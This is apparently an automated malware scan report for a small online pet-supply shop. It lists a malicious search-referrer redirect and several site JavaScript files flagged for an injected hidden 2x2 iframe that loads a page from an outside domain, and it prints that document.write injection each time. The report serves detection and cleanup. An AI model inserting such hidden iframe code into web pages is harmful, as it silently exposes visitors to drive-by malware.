Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.cooldogsupplies.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.cooldogsupplies.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 31 Aug 2014 12:48:30 GMT Location: http://kristasaidyes.com/zlft.html?h=2594864 Server: nginx/1.6.1 Vary: Accept-Encoding Content-Length: 301 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.cooldogsupplies.com/ | 200 OK Content-Length: 63300 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/index.php?action=tracking_script | 200 OK Content-Length: 182 Content-Type: text/javascript | clean |
http://www.cooldogsupplies.com/javascript/jquery.js?7a2ca | 200 OK Content-Length: 78762 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864></iframe>');
(function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]);else if(e===B){f=c.css(f,d);var h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e+"px")}})})(window); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zlft.html?j=2594864 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864> | ||
http://www.cooldogsupplies.com/javascript/menudrop.js?7a2ca | 200 OK Content-Length: 392 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864></iframe>');
$(document).ready(function() { if(document.all) { $('#Menu li.HasSubMenu').hover(function() { $(this).addClass('over'); return false; }, function() { $(this).removeClass('over'); }); } }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zlft.html?j=2594864 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864> | ||
http://www.cooldogsupplies.com/javascript/common.js?7a2ca | 200 OK Content-Length: 18238 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864></iframe>');
function get_cookie(name) { name = name += "="; var cookie_start = document.cookie.indexOf(name); if(cookie_start > -1) { cookie_start = cookie_start+name.length; cookie_end = document.cookie.indexOf(';', cookie_start); if(cookie_end == -1) { cookie_end = document.cookie.len $.each(classes, function(key,value){ if (value === className) { return; } var result = classExpression.exec(value); if (result === null) { return; } var id = result[1]; if ($('#' + id ).attr('checked')) { checked = true; return false; } }); if (!checked) { $$.hide(); } }); }).change(); }); var config = {}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zlft.html?j=2594864 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864> | ||
http://www.cooldogsupplies.com/javascript/iselector.js?7a2ca | 200 OK Content-Length: 8956 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864></iframe>');
if(typeof(ISSelectReplacement) == 'undefined') { var ISSelectReplacement = { init: function() { if(window.addEventListener) window.addEventListener('load', ISSelectReplacement.on_load, false); else window.attachEvent('onload', ISSelectReplacement.on_load); }, var option = replacement.childNodes[id[0]]; } option.selected = checkbox.checked; $(element).parents('div')[0].selectedIndex = replacement.selectedIndex; $(option).triggerHandler('click'); if (checkbox.checked) { $(element).addClass('SelectedRow'); } else { $(element).removeClass('SelectedRow'); } } }; ISSelectReplacement.init(); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zlft.html?j=2594864 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864> | ||
http://www.cooldogsupplies.com/account.php | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 31 Aug 2014 12:48:36 GMT Pragma: no-cache Location: http://www.cooldogsupplies.com/login.php?from=account.php%3Faction%3D Server: nginx/1.6.1 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: SHOP_SESSION_TOKEN=c74823b90bab222379efa8b5567cc2b0; expires=Sun, 07-Sep-2014 12:48:36 GMT; path=/; domain=.cooldogsupplies.com; HttpOnly | clean |
http://www.cooldogsupplies.com/login.php?from=account.php%3faction%3d | 200 OK Content-Length: 52171 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/orderstatus.php | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 31 Aug 2014 12:48:38 GMT Pragma: no-cache Location: http://www.cooldogsupplies.com/account.php?action=order_status Server: nginx/1.6.1 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: SHOP_SESSION_TOKEN=a90cacbb79e7a74f478f5a97cebdc484; expires=Sun, 07-Sep-2014 12:48:38 GMT; path=/; domain=.cooldogsupplies.com; HttpOnly | clean |
http://www.cooldogsupplies.com/account.php?action=order_status | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 31 Aug 2014 12:48:39 GMT Pragma: no-cache Location: http://www.cooldogsupplies.com/login.php?from=account.php%3Faction%3Dorder_status Server: nginx/1.6.1 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: SHOP_SESSION_TOKEN=bfd6d0ec2db6f0c7951201c902371194; expires=Sun, 07-Sep-2014 12:48:39 GMT; path=/; domain=.cooldogsupplies.com; HttpOnly | clean |
http://www.cooldogsupplies.com/login.php?from=account.php%3faction%3dorder_status | 200 OK Content-Length: 52171 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/wishlist.php | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 31 Aug 2014 12:48:41 GMT Pragma: no-cache Location: http://www.cooldogsupplies.com/login.php?from=wishlist.php%3F Server: nginx/1.6.1 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: SHOP_SESSION_TOKEN=f85f86d41d6c122770a0a77b0a2e4c33; expires=Sun, 07-Sep-2014 12:48:41 GMT; path=/; domain=.cooldogsupplies.com; HttpOnly | clean |
http://www.cooldogsupplies.com/login.php?from=wishlist.php%3f | 200 OK Content-Length: 52171 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/cart.php | 200 OK Content-Length: 62367 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/javascript/cart.js?7a2ca | 200 OK Content-Length: 5891 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864></iframe>');
var Cart = { ToggleShippingEstimation: function() { $('.EstimatedShippingMethods').hide(); $('.EstimateShipping').toggle(); $('.EstimateShippingLink').toggle(); $('.EstimateShipping select:eq(0)').focus(); }, EstimateShipping: function() { if ($('#shippingZoneCou if(confirm(lang.DeleteProductFieldFileConfirmation)) { $.ajax({ url: 'remote.php', type: 'post', data: 'w=deleteuploadedfileincart&field='+fieldid+'&item='+itemid, success: function(data) { document.getElementById('CurrentProductFile_'+fieldid).value = ''; $('#CartFileName_'+fieldid).hide(); } }); } return; }, ReloadCart: function() { window.location = "cart.php"; } }; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zlft.html?j=2594864 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864> | ||
http://www.cooldogsupplies.com/javascript/jquery/plugins/imodal/imodal.js?7a2ca | 200 OK Content-Length: 10338 Content-Type: application/javascript | clean |
http://www.cooldogsupplies.com/login.php | 200 OK Content-Length: 52123 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/login.php?action=create_account | 200 OK Content-Length: 75154 Content-Type: text/html | clean |
http://www.cooldogsupplies.com/javascript/formfield.js?7a2ca | 200 OK Content-Length: 20782 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864></iframe>');
var FormField = { 'GetField': function(fieldId) { if (isNaN(fieldId) && typeof(fieldId) == 'object') { fieldId = parseInt(($(fieldId).attr('id')).substr(10)); } if (fieldId == '' || isNaN(fieldId)) { return false; } var field = $('#FormField_ $('.billingButton').val(lang.BillAndShipToAddress); $('.shippingButton').val(lang.ShipToThisAddress); $('#ship_to_billing_existing').attr('checked', true); } else { $('.billingButton').val(lang.BillToThisAddress); $('.shippingButton').val(lang.ShipToThisAddress); $('#ship_to_billing_existing').attr('checked', false); } } } $(document).ready(function() { $('.FormField.JSHidden').show(); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kristasaidyes.com/zlft.html?j=2594864 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kristasaidyes.com/zlft.html?j=2594864> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cooldogsupplies.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cooldogsupplies.com/
Result: cooldogsupplies.com is not infected or malware details are not published yet.
Result: cooldogsupplies.com is not infected or malware details are not published yet.